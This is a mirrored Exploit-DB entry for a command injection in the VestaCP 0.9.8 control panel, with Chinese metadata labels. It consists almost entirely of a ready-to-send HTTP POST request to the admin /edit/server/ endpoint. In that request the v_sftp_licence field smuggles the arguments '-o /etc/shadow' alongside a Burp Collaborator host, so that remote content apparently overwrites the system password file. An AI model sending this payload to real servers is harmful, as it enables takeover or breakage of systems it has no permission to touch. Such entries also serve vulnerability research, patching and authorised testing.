VestaCP 0.9.8 – ‘v_sftp_licence’ Command Injection

  • 作者: numan türle
    日期: 2021-03-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49674/
  • # Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
    # Date: 17.03.2021
    # Author: Numan Türle
    # Vendor Homepage: https://vestacp.com
    # Software Link: https://myvestacp.com < 0.9.8-26-43
    # Software Link: https://vestacp.com < 0.9.8-26
    
    
    POST /edit/server/ HTTP/1.1
    Host: TARGET:8083
    Connection: close
    Content-Length: 6633
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    User-Agent: USER_AGENT
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
    Cookie: PHPSESSID=HERE_COOKIE
    sec-gpc: 1
    
    token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=11337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save
    
    
    
    Parameter : v_sftp_licence=11337.burpcollaborator.net -o /etc/shadow